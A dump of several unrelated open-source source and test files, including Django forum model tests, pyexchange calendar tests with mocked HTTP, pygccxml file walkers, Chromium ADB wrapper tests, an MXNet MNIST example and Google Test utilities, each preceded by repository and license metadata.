exp_ = reverse('wiki.discuss.posts', locale=t.document.locale,
args=[t.document.slug, t.id])
eq_(exp_, t.get_absolute_url())
def test_post_absolute_url(self):
t = thread(save=True)
p = t.new_post(creator=t.creator, content='foo')
url_ = reverse('wiki.discuss.posts',
locale=p.thread.document.locale,
args=[p.thread.document.slug, p.thread.id])
exp_ = urlparams(url_, hash='post-%s' % p.id)
eq_(exp_, p.get_absolute_url())
def test_last_post_updated(self):
"""Adding/Deleting the last post in a thread should
update the last_post field
"""
t = thread(save=True)
u = user(save=True)
# add a new post, then check that last_post is updated
new_post = t.new_post(creator=u, content="test")
eq_(t.last_post.id, new_post.id)
# delete the new post, then check that last_post is updated
new_post.delete()
self.assertIsNone(t.last_post.id)
class KBThreadModelTestCase(KBForumTestCase):
def test_delete_last_and_only_post_in_thread(self):
"""Deleting the only post in a thread should delete the thread"""
d = document(save=True)
t = thread(title="test", document=d, save=True)
p = t.new_post(creator=t.creator, content="test")
eq_(1, t.post_set.count())
p.delete()
eq_(0, Thread.objects.filter(pk=t.id).count())
class KBSaveDateTestCase(KBForumTestCase):
"""
Test that Thread and Post save methods correctly handle created
and updated dates.
"""
delta = datetime.timedelta(milliseconds=3000)
def setUp(self):
super(KBSaveDateTestCase, self).setUp()
self.user = user(save=True)
self.doc = document(save=True)
self.thread = thread(created=datetime.datetime(2010, 1, 12, 9, 48, 23),
save=True)
def assertDateTimeAlmostEqual(self, a, b, delta, msg=None):
"""
Assert that two datetime objects are within `range` (a timedelta).
"""
diff = abs(a - b)
assert diff < abs(delta), msg or '%s ~= %s' % (a, b)
def test_save_thread_no_created(self):
"""Saving a new thread should behave as if auto_add_now was set."""
t = self.doc.thread_set.create(title='foo', creator=self.user)
t.save()
now = datetime.datetime.now()
self.assertDateTimeAlmostEqual(now, t.created, self.delta)
def test_save_thread_created(self):
"""
Saving a new thread that already has a created date should respect
that created date.
"""
created = datetime.datetime(1992, 1, 12, 9, 48, 23)
t = self.doc.thread_set.create(title='foo', creator=self.user,
created=created)
t.save()
eq_(created, t.created)
def test_save_old_thread_created(self):
"""Saving an old thread should not change its created date."""
t = thread(save=True)
created = t.created
t.save()
eq_(created, t.created)
def test_save_new_post_no_timestamps(self):
"""
Saving a new post should behave as if auto_add_now was set on
created and auto_now set on updated.
"""
p = self.thread.new_post(creator=self.user, content='bar')
now = datetime.datetime.now()
self.assertDateTimeAlmostEqual(now, p.created, self.delta)
self.assertDateTimeAlmostEqual(now, p.updated, self.delta)
def test_save_old_post_no_timestamps(self):
"""
Saving an existing post should update the updated date.
"""
now = datetime.datetime.now()
p = self.thread.new_post(creator=self.user, content='bar')
self.assertDateTimeAlmostEqual(now, p.updated, self.delta)
p.content = 'baz'
p.updated_by = self.user
p.save()
self.assertDateTimeAlmostEqual(now, p.updated, self.delta)
def test_save_new_post_timestamps(self):
"""
Saving a new post should not allow you to override auto_add_now- and
auto_now-like functionality.
"""
created_ = datetime.datetime(1992, 1, 12, 10, 12, 32)
p = post_(thread=self.thread, content='bar', creator=self.user,
created=created_, updated=created_)
p.save()
now = datetime.datetime.now()
self.assertDateTimeAlmostEqual(now, p.created, self.delta)
self.assertDateTimeAlmostEqual(now, p.updated, self.delta)
def test_content_parsed_sanity(self):
"""The content_parsed field is populated."""
p = post_(content='yet another post', save=True)
eq_('<p>yet another post\n</p>', p.content_parsed)
| bsd-3-clause |
linkedin/pyexchange | tests/exchange2010/test_create_event.py | 4 | 10041 | """
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");?you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software?distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
import pickle
import unittest
from httpretty import HTTPretty, httprettified
from pytest import raises
from pyexchange import Exchange2010Service
from pyexchange.connection import ExchangeNTLMAuthConnection
from pyexchange.base.calendar import ExchangeEventAttendee
from pyexchange.exceptions import * # noqa
from .fixtures import * # noqa
class Test_PopulatingANewEvent(unittest.TestCase):
""" Tests all the attribute setting works when creating a new event """
calendar = None
@classmethod
def setUpClass(cls):
cls.calendar = Exchange2010Service(
connection=ExchangeNTLMAuthConnection(
url=FAKE_EXCHANGE_URL,
username=FAKE_EXCHANGE_USERNAME,
password=FAKE_EXCHANGE_PASSWORD,
)
).calendar()
def test_canary(self):
event = self.calendar.event()
assert event is not None
def test_events_created_dont_have_an_id(self):
event = self.calendar.event()
assert event.id is None
def test_can_add_a_subject(self):
event = self.calendar.event(subject=TEST_EVENT.subject)
assert event.subject == TEST_EVENT.subject
def test_can_add_a_location(self):
event = self.calendar.event(location=TEST_EVENT.location)
assert event.location == TEST_EVENT.location
def test_can_add_an_html_body(self):
event = self.calendar.event(html_body=TEST_EVENT.body)
assert event.html_body == TEST_EVENT.body
assert event.text_body is None
assert event.body == TEST_EVENT.body
def test_can_add_a_text_body(self):
event = self.calendar.event(text_body=TEST_EVENT.body)
assert event.text_body == TEST_EVENT.body
assert event.html_body is None
assert event.body == TEST_EVENT.body
def test_can_add_a_start_time(self):
event = self.calendar.event(start=TEST_EVENT.start)
assert event.start == TEST_EVENT.start
def test_can_add_an_end_time(self):
event = self.calendar.event(end=TEST_EVENT.end)
assert event.end == TEST_EVENT.end
def test_can_add_attendees_via_email(self):
event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
assert len(event.attendees) == 1
assert len(event.required_attendees) == 1
assert len(event.optional_attendees) == 0
assert event.attendees[0].email == PERSON_REQUIRED_ACCEPTED.email
def test_can_add_multiple_attendees_via_email(self):
event = self.calendar.event(attendees=[PERSON_REQUIRED_ACCEPTED.email, PERSON_REQUIRED_TENTATIVE.email])
assert len(event.attendees) == 2
assert len(event.required_attendees) == 2
assert len(event.optional_attendees) == 0
def test_can_add_attendees_via_named_tuple(self):
person = ExchangeEventAttendee(name=PERSON_OPTIONAL_ACCEPTED.name, email=PERSON_OPTIONAL_ACCEPTED.email, required=PERSON_OPTIONAL_ACCEPTED.required)
event = self.calendar.event(attendees=person)
assert len(event.attendees) == 1
assert len(event.required_attendees) == 0
assert len(event.optional_attendees) == 1
assert event.attendees[0].email == PERSON_OPTIONAL_ACCEPTED.email
def test_can_assign_to_required_attendees(self):
event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
event.required_attendees = [PERSON_REQUIRED_ACCEPTED.email, PERSON_OPTIONAL_ACCEPTED.email]
assert len(event.attendees) == 2
assert len(event.required_attendees) == 2
assert len(event.optional_attendees) == 0
def test_can_assign_to_optional_attendees(self):
event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
event.optional_attendees = PERSON_OPTIONAL_ACCEPTED.email
assert len(event.attendees) == 2
assert len(event.required_attendees) == 1
assert len(event.optional_attendees) == 1
assert event.required_attendees[0].email == PERSON_REQUIRED_ACCEPTED.email
assert event.optional_attendees[0].email == PERSON_OPTIONAL_ACCEPTED.email
def test_can_add_resources(self):
event = self.calendar.event(resources=[RESOURCE.email])
assert len(event.resources) == 1
assert event.resources[0].email == RESOURCE.email
assert event.conference_room.email == RESOURCE.email
class Test_CreatingANewEvent(unittest.TestCase):
service = None
event = None
@classmethod
def setUpClass(cls):
cls.service = Exchange2010Service(connection=ExchangeNTLMAuthConnection(url=FAKE_EXCHANGE_URL, username=FAKE_EXCHANGE_USERNAME, password=FAKE_EXCHANGE_PASSWORD))
def setUp(self):
self.event = self.service.calendar().event(start=TEST_EVENT.start, end=TEST_EVENT.end)
def test_events_must_have_a_start_date(self):
self.event.start = None
with raises(ValueError):
self.event.create()
def test_events_must_have_an_end_date(self):
self.event.end = None
with raises(ValueError):
self.event.create()
def test_event_end_date_must_come_after_start_date(self):
self.event.start, self.event.end = self.event.end, self.event.start
with raises(ValueError):
self.event.create()
def test_attendees_must_have_an_email_address_take1(self):
with raises(ValueError):
self.event.add_attendees(ExchangeEventAttendee(name="Bomb", email=None, required=True))
self.event.create()
def test_attendees_must_have_an_email_address_take2(self):
with raises(ValueError):
self.event.add_attendees([None])
self.event.create()
def test_event_reminder_must_be_int(self):
self.event.reminder_minutes_before_start = "not an integer"
with raises(TypeError):
self.event.create()
def test_event_all_day_must_be_bool(self):
self.event.is_all_day = "not a bool"
with raises(TypeError):
self.event.create()
def cant_delete_a_newly_created_event(self):
with raises(ValueError):
self.event.delete()
def cant_update_a_newly_created_event(self):
with raises(ValueError):
self.event.update()
def cant_resend_invites_for_a_newly_created_event(self):
with raises(ValueError):
self.event.resend_invitations()
@httprettified
def test_can_set_subject(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.subject = TEST_EVENT.subject
self.event.create()
assert TEST_EVENT.subject in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_can_set_location(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.location = TEST_EVENT.location
self.event.create()
assert TEST_EVENT.location in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_can_set_html_body(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8'
)
self.event.html_body = TEST_EVENT.body
self.event.create()
assert TEST_EVENT.body in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_can_set_text_body(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.text_body = TEST_EVENT.body
self.event.create()
assert TEST_EVENT.body in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_start_time(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.create()
assert TEST_EVENT.start.strftime(EXCHANGE_DATE_FORMAT) in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_end_time(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.create()
assert TEST_EVENT.end.strftime(EXCHANGE_DATE_FORMAT) in HTTPretty.last_request.body.decode('utf-8')
@httprettified
def test_attendees(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
attendees = [PERSON_REQUIRED_ACCEPTED.email, PERSON_REQUIRED_TENTATIVE.email]
self.event.attendees = attendees
self.event.create()
for email in attendees:
assert email in HTTPretty.last_request.body.decode('utf-8')
def test_resources_must_have_an_email_address(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
attendees = [PERSON_WITH_NO_EMAIL_ADDRESS]
with raises(ValueError):
self.event.attendees = attendees
self.event.create()
@httprettified
def test_resources(self):
HTTPretty.register_uri(
HTTPretty.POST, FAKE_EXCHANGE_URL,
body=CREATE_ITEM_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
self.event.resources = [RESOURCE.email]
self.event.create()
assert RESOURCE.email in HTTPretty.last_request.body.decode('utf-8')
def test_events_can_be_pickled(self):
self.event.subject = "events can be pickled"
pickled_event = pickle.dumps(self.event)
new_event = pickle.loads(pickled_event)
assert new_event.subject == "events can be pickled"
| apache-2.0 |
daviddoria/itkHoughTransform | Wrapping/WrapITK/Languages/SwigInterface/pygccxml-1.0.0/pygccxml/utils/fs_utils.py | 13 | 4611 | # Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
from types import *
##If you want include files that doesn't have extension then use filter like '*.'
def _make_list( argument ):
if type(argument) in StringTypes:
if argument:
return [argument]
else:
return []
elif type(argument) is ListType:
return argument
else:
raise TypeError( 'Argument "%s" must be or list of strings or string.' % argument )
class base_files_iterator:
def __init__(self, file_exts, is_include_exts = True):
self.__file_exts = _make_list( file_exts )
self.__is_include_exts = is_include_exts
def _is_to_skip(self, file_path):
if not self.__file_exts:
return 0
file_ext = os.path.splitext( file_path )[1]
if not file_ext:
file_ext = '.' + file_ext
file_ext = '*' + file_ext
if file_ext.lower() in self.__file_exts:
return not self.__is_include_exts
else:
return self.__is_include_exts
def _subdirectories_and_files(self, directory_path):
files, directories = [], []
directory_contents = os.listdir(directory_path)
for object_name in directory_contents:
object_path = os.path.join(directory_path, object_name)
if os.path.isfile( object_path ) and not self._is_to_skip( object_path ):
files.append( object_path )
elif os.path.isdir( object_path ):
directories.append( object_path )
else:
pass
return directories, files
def __iter__(self):
raise NotImplementedError
def next(self):
raise NotImplementedError
def restart(self):
raise NotImplementedError
class files_walker(base_files_iterator):
def __init__(self, directories, file_ext_filter = '', is_include_filter = True, is_recursive = True):
base_files_iterator.__init__(self, file_ext_filter, is_include_filter)
self.__directories = _make_list( directories )
self.__is_recursive = is_recursive
self.__file_generator = None
def __walk(self):
directories = self.__directories[:]
while directories:
sub_directories, files = self._subdirectories_and_files( directories.pop(0) )
if self.__is_recursive:
for directory in sub_directories:
directories.append( directory )
for file_os in files:
yield file_os
def __iter__(self):
self.__file_generator = self.__walk()
return self
def next(self):
return self.__file_generator.next()
def restart(self):
self.__file_generator = None
class directories_walker:
def __init__(self, directories, is_recursive = 1):
self.__directories = []
for root in _make_list( directories ):
self.__directories.extend( self.__sub_directories( root ) )
self.__is_recursive = is_recursive
self.__directory_generator = None
def __sub_directories(self, directory_path):
sub_directories = []
directory_contains = os.listdir(directory_path)
for object_in_directory in directory_contains:
full_path = os.path.join(directory_path, object_in_directory)
if os.path.isdir( full_path ):
sub_directories.append( full_path )
return sub_directories
def __walk(self):
directories = self.__directories[:]
for curr_directory in directories:
yield curr_directory
if self.__is_recursive:
for f in directories_walker( [curr_directory], True ):
yield f
def __iter__(self):
self.__directory_generator = self.__walk()
return self
def next(self):
return self.__directory_generator.next()
def restart(self):
self.__directory_generator = None
if '__main__' == __name__:
pass
#lFileCount = 0
#for file_os in files_iterator( r'C:\Program Files\Microsoft Visual Studio\VC98\Include\stlport', ['*.h', '*.'], True, False):
#print file_os
#lFileCount += 1
#print lFileCount
#~ for directory in directories_iterator( '/home/roman/language-binding', False ):
#~ print directory
#~ for directory in directories_iterator( '/home/roman/language-binding', True ):
#~ print directory
| apache-2.0 |
TeslaProject/external_chromium_org | build/android/pylib/device/adb_wrapper_test.py | 36 | 2716 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for the AdbWrapper class."""
import os
import tempfile
import time
import unittest
from pylib.device import adb_wrapper
from pylib.device import device_errors
class TestAdbWrapper(unittest.TestCase):
def setUp(self):
devices = adb_wrapper.AdbWrapper.GetDevices()
assert devices, 'A device must be attached'
self._adb = devices[0]
self._adb.WaitForDevice()
@staticmethod
def _MakeTempFile(contents):
"""Make a temporary file with the given contents.
Args:
contents: string to write to the temporary file.
Returns:
The absolute path to the file.
"""
fi, path = tempfile.mkstemp()
with os.fdopen(fi, 'wb') as f:
f.write(contents)
return path
def testShell(self):
output = self._adb.Shell('echo test', expect_rc=0)
self.assertEqual(output.strip(), 'test')
output = self._adb.Shell('echo test')
self.assertEqual(output.strip(), 'test')
self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Shell,
'echo test', expect_rc=1)
def testPushPull(self):
path = self._MakeTempFile('foo')
device_path = '/data/local/tmp/testfile.txt'
local_tmpdir = os.path.dirname(path)
self._adb.Push(path, device_path)
self.assertEqual(self._adb.Shell('cat %s' % device_path), 'foo')
self._adb.Pull(device_path, local_tmpdir)
with open(os.path.join(local_tmpdir, 'testfile.txt'), 'r') as f:
self.assertEqual(f.read(), 'foo')
def testInstall(self):
path = self._MakeTempFile('foo')
self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Install,
path)
def testForward(self):
self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Forward,
0, 0)
def testUninstall(self):
self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Uninstall,
'some.nonexistant.package')
def testRebootWaitForDevice(self):
self._adb.Reboot()
print 'waiting for device to reboot...'
while self._adb.GetState() == 'device':
time.sleep(1)
self._adb.WaitForDevice()
self.assertEqual(self._adb.GetState(), 'device')
print 'waiting for package manager...'
while 'package:' not in self._adb.Shell('pm path android'):
time.sleep(1)
def testRootRemount(self):
self._adb.Root()
while True:
try:
self._adb.Shell('start')
break
except device_errors.AdbCommandFailedError:
time.sleep(1)
self._adb.Remount()
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
mlperf/training_results_v0.6 | Fujitsu/benchmarks/resnet/implementations/mxnet/example/stochastic-depth/sd_mnist.py | 8 | 4244 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
################################################################################
# A sanity check mainly for debugging purpose. See sd_cifar10.py for a non-trivial
# example of stochastic depth on cifar10.
################################################################################
import os
import sys
import mxnet as mx
import logging
import sd_module
def get_conv(
name,
data,
num_filter,
kernel,
stride,
pad,
with_relu,
bn_momentum
):
conv = mx.symbol.Convolution(
name=name,
data=data,
num_filter=num_filter,
kernel=kernel,
stride=stride,
pad=pad,
no_bias=True
)
bn = mx.symbol.BatchNorm(
name=name + '_bn',
data=conv,
fix_gamma=False,
momentum=bn_momentum,
# Same with https://github.com/soumith/cudnn.torch/blob/master/BatchNormalization.lua
# cuDNN v5 don't allow a small eps of 1e-5
eps=2e-5
)
return (
# It's better to remove ReLU here
# https://github.com/gcr/torch-residual-networks
mx.symbol.Activation(name=name + '_relu', data=bn, act_type='relu')
if with_relu else bn
)
death_rates = [0.3]
contexts = [mx.context.cpu()]
data = mx.symbol.Variable('data')
conv = get_conv(
name='conv0',
data=data,
num_filter=16,
kernel=(3, 3),
stride=(1, 1),
pad=(1, 1),
with_relu=True,
bn_momentum=0.9
)
base_mod = mx.mod.Module(conv, label_names=None, context=contexts)
mod_seq = mx.mod.SequentialModule()
mod_seq.add(base_mod)
for i in range(len(death_rates)):
conv = get_conv(
name='conv0_%d' % i,
data=mx.sym.Variable('data_%d' % i),
num_filter=16,
kernel=(3, 3),
stride=(1, 1),
pad=(1, 1),
with_relu=True,
bn_momentum=0.9
)
conv = get_conv(
name='conv1_%d' % i,
data=conv,
num_filter=16,
kernel=(3, 3),
stride=(1, 1),
pad=(1, 1),
with_relu=False,
bn_momentum=0.9
)
mod = sd_module.StochasticDepthModule(conv, data_names=['data_%d' % i],
context=contexts, death_rate=death_rates[i])
mod_seq.add(mod, auto_wiring=True)
act = mx.sym.Activation(mx.sym.Variable('data_final'), act_type='relu')
flat = mx.sym.Flatten(act)
pred = mx.sym.FullyConnected(flat, num_hidden=10)
softmax = mx.sym.SoftmaxOutput(pred, name='softmax')
mod_seq.add(mx.mod.Module(softmax, context=contexts, data_names=['data_final']),
auto_wiring=True, take_labels=True)
n_epoch = 2
batch_size = 100
basedir = os.path.dirname(__file__)
mx.test_utils.get_mnist_ubyte()
train = mx.io.MNISTIter(
image=os.path.join(basedir, "data", "train-images-idx3-ubyte"),
label=os.path.join(basedir, "data", "train-labels-idx1-ubyte"),
input_shape=(1, 28, 28), flat=False,
batch_size=batch_size, shuffle=True, silent=False, seed=10)
val = mx.io.MNISTIter(
image=os.path.join(basedir, "data", "t10k-images-idx3-ubyte"),
label=os.path.join(basedir, "data", "t10k-labels-idx1-ubyte"),
input_shape=(1, 28, 28), flat=False,
batch_size=batch_size, shuffle=True, silent=False)
logging.basicConfig(level=logging.DEBUG)
mod_seq.fit(train, val, optimizer_params={'learning_rate': 0.01, 'momentum': 0.9},
num_epoch=n_epoch, batch_end_callback=mx.callback.Speedometer(batch_size, 10))
| apache-2.0 |
oroulet/freeopcua | tests/gmock/gtest/test/gtest_test_utils.py | 1100 | 10812 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
import subprocess
_SUBPROCESS_MODULE_AVAILABLE = True
except:
import popen2
_SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# The environment variable for specifying the path to the premature-exit file.
PREMATURE_EXIT_FILE_ENV_VAR = 'TEST_PREMATURE_EXIT_FILE'
environ = os.environ.copy()
def SetEnvVar(env_var, value):
"""Sets/unsets an environment variable to a given value."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
'build_dir': os.path.dirname(sys.argv[0])}
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
"""Parses and strips Google Test flags from argv. This is idempotent."""
# Suppresses the lint complaint about a global variable since we need it
# here to maintain module-wide state.
global _gtest_flags_are_parsed # pylint: disable-msg=W0603
if _gtest_flags_are_parsed:
return
_gtest_flags_are_parsed = True
for flag in _flag_map:
# The environment variable overrides the default value.
if flag.upper() in os.environ:
_flag_map[flag] = os.environ[flag.upper()]
# The command line flag overrides the environment variable.
i = 1 # Skips the program name.
while i < len(argv):
prefix = '--' + flag + '='
if argv[i].startswith(prefix):
_flag_map[flag] = argv[i][len(prefix):]
del argv[i]
break
else:
# We don't increment i in case we just found a --gtest_* flag
# and removed it from argv.
i += 1
def GetFlag(flag):
"""Returns the value of the given flag."""
# In case GetFlag() is called before Main(), we always call
# _ParseAndStripGTestFlags() here to make sure the --gtest_* flags
# are parsed.
_ParseAndStripGTestFlags(sys.argv)
return _flag_map[flag]
def GetSourceDir():
"""Returns the absolute path of the directory where the .py files are."""
return os.path.abspath(GetFlag('source_dir'))
def GetBuildDir():
"""Returns the absolute path of the directory where the test binaries are."""
return os.path.abspath(GetFlag('build_dir'))
_temp_dir = None
def _RemoveTempDir():
if _temp_dir:
shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
"""Returns a directory for temporary files."""
global _temp_dir
if not _temp_dir:
_temp_dir = tempfile.mkdtemp()
return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
"""Returns the absolute path of the test binary given its name.
The function will print a message and abort the program if the resulting file
doesn't exist.
Args:
executable_name: name of the test binary that the test script runs.
build_dir: directory where to look for executables, by default
the result of GetBuildDir().
Returns:
The absolute path of the test binary.
"""
path = os.path.abspath(os.path.join(build_dir or GetBuildDir(),
executable_name))
if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
path += '.exe'
if not os.path.exists(path):
message = (
'Unable to find the test binary. Please make sure to provide path\n'
'to the binary via the --build_dir flag or the BUILD_DIR\n'
'environment variable.')
print >> sys.stderr, message
sys.exit(1)
return path
def GetExitStatus(exit_code):
"""Returns the argument to exit(), or -1 if exit() wasn't called.
Args:
exit_code: the result value of os.system(command).
"""
if os.name == 'nt':
# On Windows, os.WEXITSTATUS() doesn't work and os.system() returns
# the argument to exit() directly.
return exit_code
else:
# On Unix, os.WEXITSTATUS() must be used to extract the exit status
# from the result of os.system().
if os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
return -1
class Subprocess:
def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
"""Changes into a specified directory, if provided, and executes a command.
Restores the old directory afterwards.
Args:
command: The command to run, in the form of sys.argv.
working_dir: The directory to change into.
capture_stderr: Determines whether to capture stderr in the output member
or to discard it.
env: Dictionary with environment to pass to the subprocess.
Returns:
An object that represents outcome of the executed process. It has the
following attributes:
terminated_by_signal True iff the child process has been terminated
by a signal.
signal Sygnal that terminated the child process.
exited True iff the child process exited normally.
exit_code The code with which the child process exited.
output Child process's stdout and stderr output
combined in a string.
"""
# The subprocess module is the preferrable way of running programs
# since it is available and behaves consistently on all platforms,
# including Windows. But it is only available starting in python 2.4.
# In earlier python versions, we revert to the popen2 module, which is
# available in python 2.0 and later but doesn't provide required
# functionality (Popen4) under Windows. This allows us to support Mac
# OS X 10.4 Tiger, which has python 2.3 installed.
if _SUBPROCESS_MODULE_AVAILABLE:
if capture_stderr:
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=stderr,
cwd=working_dir, universal_newlines=True, env=env)
# communicate returns a tuple with the file obect for the child's
# output.
self.output = p.communicate()[0]
self._return_code = p.returncode
else:
old_dir = os.getcwd()
def _ReplaceEnvDict(dest, src):
# Changes made by os.environ.clear are not inheritable by child
# processes until Python 2.6. To produce inheritable changes we have
# to delete environment items with the del statement.
for key in dest.keys():
del dest[key]
dest.update(src)
# When 'env' is not None, backup the environment variables and replace
# them with the passed 'env'. When 'env' is None, we simply use the
# current 'os.environ' for compatibility with the subprocess.Popen
# semantics used above.
if env is not None:
old_environ = os.environ.copy()
_ReplaceEnvDict(os.environ, env)
try:
if working_dir is not None:
os.chdir(working_dir)
if capture_stderr:
p = popen2.Popen4(command)
else:
p = popen2.Popen3(command)
p.tochild.close()
self.output = p.fromchild.read()
ret_code = p.wait()
finally:
os.chdir(old_dir)
# Restore the old environment variables
# if they were replaced.
if env is not None:
_ReplaceEnvDict(os.environ, old_environ)
# Converts ret_code to match the semantics of
# subprocess.Popen.returncode.
if os.WIFSIGNALED(ret_code):
self._return_code = -os.WTERMSIG(ret_code)
else: # os.WIFEXITED(ret_code) should return True here.
self._return_code = os.WEXITSTATUS(ret_code)
if self._return_code < 0:
self.terminated_by_signal = True
self.exited = False
self.signal = -self._return_code
else:
self.terminated_by_signal = False
self.exited = True
self.exit_code = self._return_code
def Main():
"""Runs the unit test."""
# We must call _ParseAndStripGTestFlags() before calling
# unittest.main(). Otherwise the latter will be confused by the
# --gtest_* flags.
_ParseAndStripGTestFlags(sys.argv)
# The tested binaries should not be writing XML output files unless the
# script explicitly instructs them to.
# TODO(vladl@google.com): Move this into Subprocess when we implement
# passing environment into it as a parameter.
if GTEST_OUTPUT_VAR_NAME in os.environ:
del os.environ[GTEST_OUTPUT_VAR_NAME]
_test_module.main()
| lgpl-3.0 |
pio-masaki/android-kernel-at1s0 | Documentation/target/tcm_mod_builder.py | 2 | 43848 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
